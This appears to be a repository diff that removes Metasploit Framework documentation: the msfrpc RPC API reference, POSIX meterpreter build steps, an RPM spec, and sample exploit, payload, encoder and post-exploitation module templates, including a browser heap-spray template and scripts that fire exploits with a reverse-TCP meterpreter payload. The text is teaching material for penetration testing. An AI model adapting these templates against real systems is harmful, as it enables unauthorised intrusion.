-                               Windows 2000 5.0.4.0 SP4 (IA32) (ws2help.dll)
332
-
333
-   For custom development purposes, the script can also be told to dump
334
-   results in raw XML format such that extensions can be written to the
335
-   interface in the future by third parties. This can be accomplished by
336
-   specifying the -x parameter.
337
-
338
-More information online at: http://metasploit.com/framework/

+ 0
- 166
documentation/msfrpc.txt View File

@@ -1,166 +0,0 @@
1
-[ INTRODUCTION ]
2
-
3
-The msfrpcd daemon uses the xmlrpc plugin to provide a remote
4
-interface to the Metasploit Framework. By default, this service
5
-listens on port 55553, uses SSL, and is password protected.
6
-
7
-The RPC interface allows access to a minimal set of framework
8
-APIs, covering the core framework, the module set, the job list,
9
-and the session table. These APIs can be used to enumerate
10
-modules, execute them, and interact with the resulting sessions
11
-and jobs. 
12
-
13
-
14
-[ USAGE ]
15
-
16
-To activate the RPC interface, launch msfrpcd, or load msfconsole
17
-and load the xmlrpc plugin. 
18
-
19
-$ ./msfrpcd -P s3cr3tp4ss
20
- - or -
21
-msf> load xmlrpc Pass=s3cr3tp4ss
22
-
23
-Once the interface is started, any compatible RPC interface can be used
24
-to interact with the service. The 'msfrpc' client provides a Ruby
25
-shell that can be used to talk to the service.
26
-
27
-$ ./msfrpc -h server_name -P s3cr3tp4ss
28
-[*] The 'rpc' object holds the RPC client interface
29
-
30
->> rpc.call("core.version")
31
-=> {"version"=>"3.3-dev"}
32
-
33
-
34
-[ API - AUTH ]
35
-
36
- Method: auth.login
37
-Expects: username, password
38
-Returns: { "result" => "success", "token" => "<token>" } 
39
-Summary: This method is used by rpc.login() to obtain the session key
40
-(token) which is sent in subsequent requests. This token uniquely
41
-identifies a particular client and can be used by multiple clients,
42
-even after the originating TCP session is closed. The RPC client
43
-object automatically sends this token with all other method calls.
44
-Inactive tokens are destroyed after five minutes of non-use. 
45
-
46
-
47
-[ API - CORE ]
48
-
49
- Method: core.version
50
-Expects: none
51
-Returns: { "version" => "<framework-version>" } 
52
-
53
-
54
-[ API - MODULE ]
55
-
56
- Method: module.exploits
57
- Method: module.auxiliary
58
- Method: module.payloads
59
- Method. module.encoders
60
- Method: module.nops
61
-Expects: none
62
-Returns: { "modules" => [ "module1", "module2", ... ] } 
63
-Summary: This method is used to obtain a list of available modules
64
-of the specified type. The resulting module names can be used in
65
-other calls within the module service.
66
-
67
- Method: module.info
68
-Expects: module_type, module_name
69
-Returns: { "name" => "<name>", ... }
70
-Summary: This method returns all shared module fields (name, authors,
71
-version, description, etc), but also the list of targets and actions
72
-when appropriate.
73
-
74
- Method: module.options
75
-Expects: module_type, module_name
76
-Returns: { "<option_name>" => { "type" => "integer", ... } }
77
-Summary: This method returns a list of all options for a given module,
78
-including advanced and evasion options. The returned hash contains
79
-detailed information about each option, including its type, its
80
-default value, whether it is required, and so on.
81
-
82
- Method: module.compatible_payloads
83
-Expects: module_name
84
-Returns: { "payloads" => [ "payload1", "payload2", ... ] }
85
-Summary: This method only works for exploit modules and returns a
86
-list of payloads that are compatible with the specified exploit.
87
-
88
- Method: module.execute
89
-Expects: module_type, module_name, options_hash
90
-Returns: { "result" => "success" }
91
-Summary: This method only works for exploit and auxiliary modules
92
-and uses the simplified framework API to launch these modules
93
-with the specified options. Option values should be placed into
94
-the options_hash argument, including items such as PAYLOAD,
95
-TARGET, ACTION, and all required options.
96
-
97
-
98
-
99
-[ API - JOB ]
100
-
101
- Method: job.list
102
-Expects: none
103
-Returns: { "<job_id>" => "<job_name>" }
104
-Summary: This method returns a list of running jobs, along with
105
-the name of the job.
106
-
107
- Method: job.stop
108
-Expects: job_id
109
-Returns: { "result" => "success" }
110
-Summary: This method kills a specific job by ID
111
-
112
-
113
-
114
-[ API - SESSION ]
115
-
116
- Method: session.list
117
-Expects: none
118
-Returns: { "<session_id>" => { "type" => "shell", ... } }
119
-Summary: This method returns a list of active sessions, including
120
-the fields type, tunnel_local, tunnel_peer, via_exploit,
121
-via_payload, and desc.  
122
-
123
- Method: session.stop
124
-Expects: session_id
125
-Returns: { "result" => "success" }
126
-Summary: This method kills a specific session by ID
127
-
128
- Method: session.shell_read
129
-Expects: session_id
130
-Returns: { "data" => "<shell_data>" }
131
-Summary: This method reads any pending output from a session. This
132
-method only works for sessions of type "shell" and does not block.
133
-
134
- Method: session.shell_write
135
-Expects: session_id, shell_data
136
-Returns: { "write_count" => "<number_of_bytes_written>" }
137
-Summary: This method writes the specified input into the session. 
138
-This method only works for sessions of type "shell" and does not 
139
-block.
140
-
141
-
142
-[ EXCEPTIONS ]
143
-
144
-When an error occurs, an exception is thrown on the client side. This
145
-exception will be of class XMLRPC::FaultException and the faultCode
146
-and faultString methods of this exception will contain detailed
147
-information about the problem. Many API calls will raise faultCode
148
-of 404 when the specified item is not found. An unhandled, server
149
-exception will result in a faultCode of 500 on the client side.
150
-
151
-
152
-
153
-[ SECURITY CONSIDERATIONS ]
154
-
155
-At this time, the SSL certificate used by the service is 
156
-dynamically allocated, making it vulnerable to a man-in-the-middle
157
-attack. Future versions will address this by allowing a certificate
158
-to be generated and verified.
159
-
160
-The current implementation passes the username and password for the
161
-RPC service as parameters on the command line. This can lead to
162
-disclosure of the password to other local users on some Unix systems.
163
-The msfrpc and msfrpcd applications change the displayed arguments
164
-as soon as they are launched, but there is still a brief window of
165
-time where another local user may snoop the msfrpcd password. In the
166
-future, the password will be specified via TTY or file.

+ 0
- 77
documentation/posix_meterpreter.txt View File

@@ -1,77 +0,0 @@
1
-Steps needed to build the POSIX meterpreter from scratch
2
---------------------------------------------------------
3
-
4
-1) Build bionic libc
5
-
6
-you will need "jam" package for compiling. 
7
-
8
-# cd external/source/meterpreter/source/bionic/libc
9
-# ARCH=x86 TOP=${PWD} jam
10
-... lots of output ...
11
-# cd out/x86/
12
-# sh make.sh
13
-.. makes dynamic library ...
14
-
15
-you now have a libbionic.so, copy to source/bionic/compiled/libc.so
16
-
17
-2) Build bionic libm
18
-
19
-# cd external/source/meterpreter/source/bionic/libm
20
-# make -f msfMakefile
21
-... lots of output ...
22
-
23
-you now have a libm.so, copy to source/bionic/compiled/
24
-
25
-3) Build bionic libdl
26
-
27
-# cd external/source/meterpreter/source/bionic/libdl
28
-# make
29
-
30
-copy libdl.so to source/bionic/compiled
31
-
32
-4) Build openssl 
33
-
34
-download openssl 0.9.8o
35
-
36
-Edit the Configure file. Locate "linux-elf line, duplicate it, s/-elf/-msf/, s/-ldl//, on the duplicate.
37
-
38
-# ./Configure threads no-zlib no-krb5 386 --prefix=/tmp/out linux-msf no-dlfcn shared
39
-...
40
-# LIBC=/path/to/bionic/libc
41
-# LIBM=/path/to/bionic/libm
42
-# COMPILED=/path/to/bionic/compiled
43
-# make CC="gcc  -I ${LIBC}/include -I ${LIBC}/kernel/common/linux/ -I ${LIBC}/kernel/common/ -I ${LIBC}/arch-x86/include/ -I ${LIBC}/kernel/arch-x86/  -I${LIBC}/private -fPIC -DPIC -nostdinc -nostdlib -Dwchar_t='char' -fno-builtin -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -I${LIBM}/include  -L${COMPILED}  -D_BYTE_ORDER=_LITTLE_ENDIAN -lc" depend  clean all 
44
-... lots of compiling ...
45
-# cp libssl.so ${COMPILED}
46
-# cp libcrypto.so ${COMPILED}
47
-
48
-5) Compile the common/support library code
49
-
50
-# cd external/source/meterpreter/workspace/common
51
-# make
52
-
53
-.. copy libsupport.so to source/bionic/compiled ..
54
-
55
-6) Build the metsrv_main binary
56
-
57
-# cd external/source/meterpreter/workspace/metsrv
58
-# make
59
-
60
-You will need to generate a linker script, and set the location to 0x00040000. -Wl,-verbose >log , edit log for == == 
61
-
62
-.. copy metsrv_main to source/bionic/compiled directory
63
-
64
-7) Build the rtld binary (last step)
65
-
66
-# cd external/source/meterpreter/source/server/rtld
67
-# make test
68
-
69
-(make test will make msflinker, which you can use to test the meterpreter)
70
-
71
-8) Compile the ext_server_stdapi 
72
-
73
-# external/source/meterpreter/workspace/extensions/stdapi
74
-# make
75
-
76
-copy ext_server_stdapi.so to data/meterpreter/ext_server_stdai.lso <-- notice the .lso
77
-

+ 0
- 87
documentation/rpm/metasploit.spec View File

@@ -1,87 +0,0 @@
1
-%define name metasploit
2
-%define version 3.2
3
-%define release 1
4
-%define prefix /opt
5
-%define __spec_install_post :
6
-
7
-
8
-BuildArch: noarch
9
-BuildRoot: %(mktemp -ud %{_tmppath}/%{name}-%{version}-%{release}-XXXXXX)
10
-Group: Applications/System
11
-License: BSD
12
-Name: %{name}
13
-Packager: Ramon de Carvalho Valle <ramon@risesecurity.org>
14
-Release: %{release}
15
-Requires: ruby
16
-Source: %{name}-%{version}.tar.gz
17
-Summary: The Metasploit Framework
18
-URL: http://www.metasploit.com/framework/
19
-Version: %{version}
20
-
21
-
22
-%description
23
-The Metasploit Framework is a development platform for creating security tools
24
-and exploits. The framework is used by network security professionals to
25
-perform penetration tests, system administrators to verify patch
26
-installations, product vendors to perform regression testing, and security
27
-researchers world-wide. The framework is written in the Ruby programming
28
-language and includes components written in C and assembler.
29
-
30
-
31
-%prep
32
-%setup -q
33
-
34
-
35
-%install
36
-rm -rf %{buildroot}
37
-cd ../
38
-mkdir -p %{buildroot}%{prefix}
39
-cp -r %{name}-%{version} %{buildroot}%{prefix}
40
-
41
-
42
-%clean
43
-rm -rf %{buildroot}
44
-
45
-
46
-%post
47
-ln -s %{prefix}/%{name}-%{version}/msfcli /usr/local/bin
48
-ln -s %{prefix}/%{name}-%{version}/msfconsole /usr/local/bin
49
-ln -s %{prefix}/%{name}-%{version}/msfd /usr/local/bin
50
-ln -s %{prefix}/%{name}-%{version}/msfelfscan /usr/local/bin
51
-ln -s %{prefix}/%{name}-%{version}/msfencode /usr/local/bin
52
-ln -s %{prefix}/%{name}-%{version}/msfgui /usr/local/bin
53
-ln -s %{prefix}/%{name}-%{version}/msfmachscan /usr/local/bin
54
-ln -s %{prefix}/%{name}-%{version}/msfopcode /usr/local/bin
55
-ln -s %{prefix}/%{name}-%{version}/msfpayload /usr/local/bin
56
-ln -s %{prefix}/%{name}-%{version}/msfpescan /usr/local/bin
57
-ln -s %{prefix}/%{name}-%{version}/msfweb /usr/local/bin
58
-
59
-
60
-%postun
61
-rm -f %{prefix}/%{name}-%{version}/msfcli
62
-rm -f %{prefix}/%{name}-%{version}/msfconsole
63
-rm -f %{prefix}/%{name}-%{version}/msfd
64
-rm -f %{prefix}/%{name}-%{version}/msfelfscan
65
-rm -f %{prefix}/%{name}-%{version}/msfencode
66
-rm -f %{prefix}/%{name}-%{version}/msfgui
67
-rm -f %{prefix}/%{name}-%{version}/msfmachscan
68
-rm -f %{prefix}/%{name}-%{version}/msfopcode
69
-rm -f %{prefix}/%{name}-%{version}/msfpayload
70
-rm -f %{prefix}/%{name}-%{version}/msfpescan
71
-rm -f %{prefix}/%{name}-%{version}/msfweb
72
-
73
-
74
-
75
-%files
76
-%defattr(-,root,root)
77
-%{prefix}/%{name}-%{version}
78
-
79
-
80
-%changelog
81
-* Sun Nov 19 2008 Ramon de Carvalho Valle <ramon@risesecurity.org> - 3.2-1
82
-- Changed name to metasploit
83
-- Added post and postun scripts
84
-
85
-* Sun Nov 9 2008 Ramon de Carvalho Valle <ramon@risesecurity.org> - 3.2-1
86
-- Initial version
87
-

+ 0
- 34
documentation/samples/framework/dump_module_info.rb View File

@@ -1,34 +0,0 @@
1
-#!/usr/bin/env ruby
2
-#
3
-# $Id$
4
-#
5
-# This sample demonstrates how a module's information can be easily serialized
6
-# to a readable format.
7
-#
8
-# $Revision$
9
-#
10
-
11
-$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
12
-
13
-require 'msf/base'
14
-
15
-if (ARGV.empty?)
16
-  puts "Usage: #{File.basename(__FILE__)} module_name"
17
-  exit
18
-end
19
-
20
-modname = ARGV.shift
21
-framework = Msf::Simple::Framework.create
22
-
23
-begin
24
-  # Create the module instance.
25
-  mod = framework.modules.create(modname)
26
-  if not mod
27
-    puts "Error: The specified Msf::Module, \"#{modname}\", was not found."
28
-  else
29
-    # Dump the module's information in readable text format.
30
-    puts Msf::Serializer::ReadableText.dump_module(mod)
31
-  end
32
-rescue
33
-  puts "Error: #{$!}\n\n#{$@.join("\n")}"
34
-end

+ 0
- 30
documentation/samples/framework/encode_file.rb View File

@@ -1,30 +0,0 @@
1
-#!/usr/bin/env ruby
2
-#
3
-# $Id$
4
-#
5
-# This sample demonstrates how a file can be encoded using a framework
6
-# encoder.
7
-#
8
-# $Revision$
9
-#
10
-
11
-$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
12
-
13
-require 'msf/base'
14
-
15
-if (ARGV.empty?)
16
-  puts "Usage: #{File.basename(__FILE__)} encoder_name file_name format"
17
-  exit
18
-end
19
-
20
-framework = Msf::Simple::Framework.create
21
-
22
-begin
23
-  # Create the encoder instance.
24
-  mod = framework.encoders.create(ARGV.shift)
25
-
26
-  puts(Msf::Simple::Buffer.transform(
27
-    mod.encode(IO.read(ARGV.shift)), ARGV.shift || 'ruby'))
28
-rescue
29
-  puts "Error: #{$!}\n\n#{$@.join("\n")}"
30
-end

+ 0
- 20
documentation/samples/framework/enumerate_modules.rb View File

@@ -1,20 +0,0 @@
1
-#!/usr/bin/env ruby
2
-#
3
-# $Id$
4
-#
5
-# This sample demonstrates enumerating all of the modules in the framework and
6
-# displays their module type and reference name.
7
-#
8
-# $Revision$
9
-#
10
-
11
-$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
12
-
13
-require 'msf/base'
14
-
15
-framework = Msf::Simple::Framework.create
16
-
17
-# Enumerate each module in the framework.
18
-framework.modules.each_module { |name, mod|
19
-  puts "#{mod.type}: #{name}"
20
-}

+ 0
- 52
documentation/samples/framework/run_exploit_using_base.rb View File

@@ -1,52 +0,0 @@
1
-#!/usr/bin/env ruby
2
-#
3
-# $Id$
4
-#
5
-# This sample demonstrates using the framework core directly to launch an
6
-# exploit.  It makes use of the simplified exploit wrapper method provided by
7
-# the Msf::Simple::Exploit mixin.
8
-#
9
-# $Revision$
10
-#
11
-
12
-$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
13
-
14
-require 'msf/base'
15
-
16
-if (ARGV.length == 0)
17
-  puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
18
-  exit
19
-end
20
-
21
-framework    = Msf::Simple::Framework.create
22
-exploit_name = ARGV.shift || 'test/multi/aggressive'
23
-payload_name = ARGV.shift || 'windows/meterpreter/reverse_tcp'
24
-input        = Rex::Ui::Text::Input::Stdio.new
25
-output       = Rex::Ui::Text::Output::Stdio.new
26
-
27
-begin
28
-  # Initialize the exploit instance
29
-  exploit = framework.exploits.create(exploit_name)
30
-
31
-  # Fire it off.
32
-  session = exploit.exploit_simple(
33
-    'Payload'     => payload_name,
34
-    'OptionStr'   => ARGV.join(' '),
35
-    'LocalInput'  => input,
36
-    'LocalOutput' => output)
37
-
38
-  # If a session came back, try to interact with it.
39
-  if (session)
40
-    output.print_status("Session #{session.sid} created, interacting...")
41
-    output.print_line
42
-
43
-    session.init_ui(input, output)
44
-
45
-    session.interact
46
-  else
47
-    output.print_line("Exploit completed, no session was created.")
48
-  end
49
-
50
-rescue
51
-  output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
52
-end

+ 0
- 68
documentation/samples/framework/run_exploit_using_core.rb View File

@@ -1,68 +0,0 @@
1
-#!/usr/bin/env ruby
2
-#
3
-# $Id$
4
-#
5
-# This sample demonstrates using the framework core directly to launch an
6
-# exploit.  It uses the framework base Framework class so that the
7
-# distribution module path is automatically set, but relies strictly on
8
-# framework core classes for everything else.
9
-#
10
-# $Revision$
11
-#
12
-
13
-$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
14
-
15
-require 'msf/base'
16
-
17
-if (ARGV.length == 0)
18
-  puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
19
-  exit
20
-end
21
-
22
-framework    = Msf::Simple::Framework.create
23
-exploit_name = ARGV.shift || 'test/multi/aggressive'
24
-payload_name = ARGV.shift || 'windows/meterpreter/reverse_tcp'
25
-input        = Rex::Ui::Text::Input::Stdio.new
26
-output       = Rex::Ui::Text::Output::Stdio.new
27
-
28
-begin
29
-  # Create the exploit driver instance.
30
-  driver = Msf::ExploitDriver.new(framework)
31
-
32
-  # Initialize the exploit driver's exploit and payload instance
33
-  driver.exploit = framework.exploits.create(exploit_name)
34
-  driver.payload = framework.payloads.create(payload_name)
35
-
36
-  # Import options specified in VAR=VAL format from the supplied command
37
-  # line.
38
-  driver.exploit.datastore.import_options_from_s(ARGV.join(' '))
39
-
40
-  # Share the exploit's datastore with the payload.
41
-  driver.payload.share_datastore(driver.exploit.datastore)
42
-
43
-  # Initialize the target index to what's in the exploit's data store or 
44
-  # zero by default.
45
-  driver.target_idx = (driver.exploit.datastore['TARGET'] || 0).to_i
46
-
47
-  # Initialize the exploit and payload user interfaces.
48
-  driver.exploit.init_ui(input, output)
49
-  driver.payload.init_ui(input, output)
50
-
51
-  # Fire it off.
52
-  session = driver.run
53
-
54
-  # If a session came back, try to interact with it.
55
-  if (session)
56
-    output.print_status("Session #{session.sid} created, interacting...")
57
-    output.print_line
58
-
59
-    session.init_ui(input, output)
60
-
61
-    session.interact
62
-  else
63
-    output.print_line("Exploit completed, no session was created.")
64
-  end
65
-
66
-rescue
67
-  output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
68
-end

+ 0
- 45
documentation/samples/modules/auxiliary/sample.rb View File

@@ -1,45 +0,0 @@
1
-##
2
-# This file is part of the Metasploit Framework and may be subject to
3
-# redistribution and commercial restrictions. Please see the Metasploit
4
-# web site for more information on licensing and terms of use.
5
-#   http://metasploit.com/
6
-##
7
-
8
-require 'msf/core'
9
-
10
-###
11
-#
12
-# This sample auxiliary module simply displays the selected action and
13
-# registers a custom command that will show up when the module is used.
14
-#
15
-###
16
-class Metasploit4 < Msf::Auxiliary
17
-
18
-  def initialize(info={})
19
-    super(update_info(info,
20
-      'Name'        => 'Sample Auxiliary Module',
21
-      'Description' => 'Sample Auxiliary Module',
22
-      'Author'      => ['hdm'],
23
-      'License'     => MSF_LICENSE,
24
-      'Actions'     =>
25
-        [
26
-          ['Default Action'],
27
-          ['Another Action']
28
-        ]
29
-    ))
30
-
31
-  end
32
-
33
-  def run
34
-    print_status("Running the simple auxiliary module with action #{action.name}")
35
-  end
36
-
37
-  def auxiliary_commands
38
-    return { "aux_extra_command" => "Run this auxiliary test commmand" }
39
-  end
40
-
41
-  def cmd_aux_extra_command(*args)
42
-    print_status("Running inside aux_extra_command()")
43
-  end
44
-
45
-end

+ 0
- 35
documentation/samples/modules/encoders/sample.rb View File

@@ -1,35 +0,0 @@
1
-##
2
-# This file is part of the Metasploit Framework and may be subject to
3
-# redistribution and commercial restrictions. Please see the Metasploit
4
-# web site for more information on licensing and terms of use.
5
-#   http://metasploit.com/
6
-##
7
-
8
-###
9
-#
10
-# This sample illustrates a very basic encoder that simply returns the block
11
-# that it's passed.
12
-#
13
-###
14
-class Metasploit4 < Msf::Encoder
15
-
16
-  def initialize
17
-    super(
18
-      'Name'             => 'Sample Encoder',
19
-      'Description'      => %q{
20
-        Sample encoder that just returns the block it's passed
21
-        when encoding occurs.
22
-      },
23
-      'License'          => MSF_LICENSE,
24
-      'Author'           => 'skape',
25
-      'Arch'             => ARCH_ALL)
26
-  end
27
-
28
-  #
29
-  # Returns the unmodified buffer to the caller.
30
-  #
31
-  def encode_block(state, buf)
32
-    buf
33
-  end
34
-
35
-end

+ 0
- 149
documentation/samples/modules/exploits/ie_browser.rb View File

@@ -1,149 +0,0 @@
1
-##
2
-# This file is part of the Metasploit Framework and may be subject to
3
-# redistribution and commercial restrictions. Please see the Metasploit
4
-# Framework web site for more information on licensing and terms of use.
5
-#   http://metasploit.com/framework/
6
-##
7
-
8
-require 'msf/core'
9
-
10
-
11
-###
12
-#
13
-# This exploit sample demonstrates how a typical browser exploit is written using commonly
14
-# used components such as: HttpServer, BrowserAutopwn, RopDB, DOM Element Property Spray.
15
-#
16
-###
17
-class Metasploit4 < Msf::Exploit::Remote
18
-  Rank = NormalRanking
19
-
20
-  include Msf::Exploit::Remote::HttpServer::HTML
21
-  include Msf::Exploit::RopDb
22
-  include Msf::Exploit::Remote::BrowserAutopwn
23
-
24
-  # Set :classid and :method for ActiveX exploits. For example:
25
-  # :classid    => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
26
-  # :method     => "SetShapeNodeType",
27
-  autopwn_info({
28
-    :ua_name    => HttpClients::IE,
29
-    :ua_minver  => "8.0",
30
-    :ua_maxver  => "10.0",
31
-    :javascript => true,
32
-    :os_name    => OperatingSystems::Match::WINDOWS,
33
-    :rank       => NormalRanking
34
-  })
35
-
36
-  def initialize(info={})
37
-    super(update_info(info,
38
-      'Name'           => "Module Name",
39
-      'Description'    => %q{
40
-        This template covers IE8/9/10, and uses the user-agent HTTP header to detect
41
-        the browser version.  Please note IE8 and newer may emulate an older IE version
42
-        in compatibility mode, in that case the module won't be able to detect the
43
-        browser correctly.
44
-      },
45
-      'License'        => MSF_LICENSE,
46
-      'Author'         => [ 'sinn3r' ],
47
-      'References'     =>
48
-        [
49
-          [ 'URL', 'http://metasploit.com' ]
50
-        ],
51
-      'Platform'       => 'win',
52
-      'Targets'        =>
53
-        [
54
-          [ 'Automatic', {} ],
55
-          [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
56
-          [ 'IE 8 on Windows Vista',  { 'Rop' => :jre } ],
57
-          [ 'IE 8 on Windows 7',      { 'Rop' => :jre } ],
58
-          [ 'IE 9 on Windows 7',      { 'Rop' => :jre } ],
59
-          [ 'IE 10 on Windows 8',     { 'Rop' => :jre } ]
60
-        ],
61
-      'Payload'        =>
62
-        {
63
-          'BadChars'        => "\x00",  # js_property_spray
64
-          'StackAdjustment' => -3500
65
-        },
66
-      'Privileged'     => false,
67
-      'DisclosureDate' => "Apr 1 2013",
68
-      'DefaultTarget'  => 0))
69
-  end
70
-
71
-  def get_target(agent)
72
-    return target if target.name != 'Automatic'
73
-
74
-    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
75
-    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
76
-
77
-    ie_name = "IE #{ie}"
78
-
79
-    case nt
80
-    when '5.1'
81
-      os_name = 'Windows XP SP3'
82
-    when '6.0'
83
-      os_name = 'Windows Vista'
84
-    when '6.1'
85
-      os_name = 'Windows 7'
86
-    when '6.2'
87
-      os_name = 'Windows 8'
88
-    when '6.3'
89
-      os_name = 'Windows 8.1'      
90
-    end
91
-
92
-    targets.each do |t|
93
-      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
94
-        return t
95
-      end
96
-    end
97
-
98
-    nil
99
-  end
100
-
101
-  def get_payload(t)
102
-    stack_pivot = "\x41\x42\x43\x44"
103
-    code        = payload.encoded
104
-
105
-    case t['Rop']
106
-    when :msvcrt
107
-      print_status("Using msvcrt ROP")
108
-      rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
109
-
110
-    else
111
-      print_status("Using JRE ROP")
112
-      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
113
-    end
114
-
115
-    rop_payload
116
-  end
117
-
118
-
119
-  def get_html(t)
120
-    js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
121
-    html = %Q|
122
-      <script>
123
-      #{js_property_spray}
124
-
125
-      var s = unescape("#{js_p}");
126
-      sprayHeap({shellcode:s});
127
-      </script>
128
-    |
129
-
130
-    html.gsub(/^\t\t/, '')
131
-  end
132
-
133
-
134
-  def on_request_uri(cli, request)
135
-    agent = request.headers['User-Agent']
136
-    print_status("Requesting: #{request.uri}")
137
-
138
-    target = get_target(agent)
139
-    if target.nil?
140
-      print_error("Browser not supported, sending 404: #{agent}")
141
-      send_not_found(cli)
142
-      return
143
-    end
144
-
145
-    print_status("Target selected as: #{target.name}")
146
-    html = get_html(target)
147
-    send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
148
-  end
149
-end

+ 0
- 85
documentation/samples/modules/exploits/sample.rb View File

@@ -1,85 +0,0 @@
1
-##
2
-# This file is part of the Metasploit Framework and may be subject to
3
-# redistribution and commercial restrictions. Please see the Metasploit
4
-# web site for more information on licensing and terms of use.
5
-#   http://metasploit.com/
6
-##
7
-
8
-require 'msf/core'
9
-
10
-###
11
-#
12
-# This exploit sample shows how an exploit module could be written to exploit
13
-# a bug in an arbitrary TCP server.
14
-#
15
-###
16
-class Metasploit4 < Msf::Exploit::Remote
17
-
18
-  #
19
-  # This exploit affects TCP servers, so we use the TCP client mixin.
20
-  #
21
-  include Exploit::Remote::Tcp
22
-
23
-  def initialize(info = {})
24
-    super(update_info(info,
25
-      'Name'           => 'Sample Exploit',
26
-      'Description'    => %q{
27
-          This exploit module illustrates how a vulnerability could be exploited
28
-        in an TCP server that has a parsing bug.
29
-      },
30
-      'License'        => MSF_LICENSE,
31
-      'Author'         => ['skape'],
32
-      'References'     =>
33
-        [
34
-        ],
35
-      'Payload'        =>
36
-        {
37
-          'Space'    => 1000,
38
-          'BadChars' => "\x00",
39
-        },
40
-      'Targets'        =>
41
-        [
42
-          # Target 0: Windows All
43
-          [
44
-            'Windows XP/Vista/7/8',
45
-            {
46
-              'Platform' => 'win',
47
-              'Ret'      => 0x41424344
48
-            }
49
-          ],
50
-        ],
51
-      'DisclosureDate' => "Apr 1 2013",
52
-      'DefaultTarget'  => 0))
53
-  end
54
-
55
-  #
56
-  # The sample exploit just indicates that the remote host is always
57
-  # vulnerable.
58
-  #
59
-  def check
60
-    Exploit::CheckCode::Vulnerable
61
-  end
62
-
63
-  #
64
-  # The exploit method connects to the remote service and sends 1024 random bytes
65
-  # followed by the fake return address and then the payload.
66
-  #
67
-  def exploit
68
-    connect
69
-
70
-    print_status("Sending #{payload.encoded.length} byte payload...")
71
-
72
-    # Build the buffer for transmission
73
-    buf  = rand_text_alpha(1024)
74
-    buf << [ target.ret ].pack('V')
75
-    buf << payload.encoded
76
-
77
-    # Send it off
78
-    sock.put(buf)
79
-    sock.get_once
80
-
81
-    handler
82
-  end
83
-
84
-end
85
-

+ 0
- 34
documentation/samples/modules/nops/sample.rb View File

@@ -1,34 +0,0 @@
1
-##
2
-# This file is part of the Metasploit Framework and may be subject to
3
-# redistribution and commercial restrictions. Please see the Metasploit
4
-# web site for more information on licensing and terms of use.
5
-#   http://metasploit.com/
6
-##
7
-
8
-require 'msf/core'
9
-
10
-###
11
-#
12
-# This class implements a very basic NOP sled generator that just returns a
13
-# string of 0x90's.
14
-#
15
-###
16
-class Metasploit4 < Msf::Nop
17
-
18
-  def initialize
19
-    super(
20
-      'Name'        => 'Sample NOP Generator',
21
-      'Description' => 'Sample single-byte NOP generator',
22
-      'License'     => MSF_LICENSE,
23
-      'Author'      => 'skape',
24
-      'Arch'        => ARCH_X86)
25
-  end
26
-
27
-  #
28
-  # Returns a string of 0x90's for the supplied length.
29
-  #
30
-  def generate_sled(length, opts)
31
-    "\x90" * length
32
-  end
33
-
34
-end

+ 0
- 34
documentation/samples/modules/payloads/singles/sample.rb View File

@@ -1,34 +0,0 @@
1
-##
2
-# This file is part of the Metasploit Framework and may be subject to
3
-# redistribution and commercial restrictions. Please see the Metasploit
4
-# web site for more information on licensing and terms of use.
5
-#   http://metasploit.com/
6
-##
7
-
8
-require 'msf/core'
9
-
10
-###
11
-#
12
-# This sample payload is designed to trigger a debugger exception via int3.
13
-#
14
-###
15
-module Metasploit4
16
-
17
-  include Msf::Payload::Single
18
-
19
-  def initialize(info = {})
20
-    super(update_info(info,
21
-      'Name'          => 'Debugger Trap',
22
-      'Description'   => 'Causes a debugger trap exception through int3',
23
-      'License'       => MSF_LICENSE,
24
-      'Author'        => 'skape',
25
-      'Platform'      => 'win',
26
-      'Arch'          => ARCH_X86,
27
-      'Payload'       =>
28
-        {
29
-          'Payload' => "\xcc"
30
-        }
31
-      ))
32
-  end
33
-
34
-end

+ 0
- 40
documentation/samples/modules/post/sample.rb View File

@@ -1,40 +0,0 @@
1
-##
2
-# This file is part of the Metasploit Framework and may be subject to
3
-# redistribution and commercial restrictions. Please see the Metasploit
4
-# web site for more information on licensing and terms of use.
5
-#   http://metasploit.com/
6
-##
7
-
8
-require 'msf/core'
9
-require 'msf/core/post/common'
10
-
11
-###
12
-#
13
-# This post module sample shows how we can execute a command on the compromised machine
14
-#
15
-###
16
-class Metasploit4 < Msf::Post
17
-
18
-  include Msf::Post::Common
19
-
20
-  def initialize(info={})
21
-    super(update_info(info,
22
-      'Name'          => 'Sample Post Module',
23
-      'Description'   => %q{Sample Post Module},
24
-      'License'       => MSF_LICENSE,
25
-      'Author'        => [ 'sinn3r'],
26
-      'Platform'      => [ 'win'],
27
-      'SessionTypes'  => [ "shell", "meterpreter" ]
28
-    ))
29
-  end
30
-
31
-  #
32
-  # This post module runs a ipconfig command and returns the output
33
-  #
34
-  def run
35
-    print_status("Executing ipconfig on remote machine")
36
-    o = cmd_exec("ipconfig")
37
-    print_line(o)
38
-  end
39
-
40
-end

+ 0
- 207
documentation/samples/pro/msfrpc_pro_discover.rb View File

@@ -1,207 +0,0 @@
1
-#!/usr/bin/env ruby
2
-require 'rubygems'
3
-require 'optparse'
4
-require 'msfrpc-client'
5
-require 'rex/ui'
6
-
7
-def usage(ropts)
8
-  $stderr.puts ropts
9
-
10
-  if @rpc and @rpc.token
11
-    wspaces = @rpc.call("pro.workspaces") rescue {}
12
-    if wspaces.keys.length > 0
13
-      $stderr.puts "Active Projects:"
14
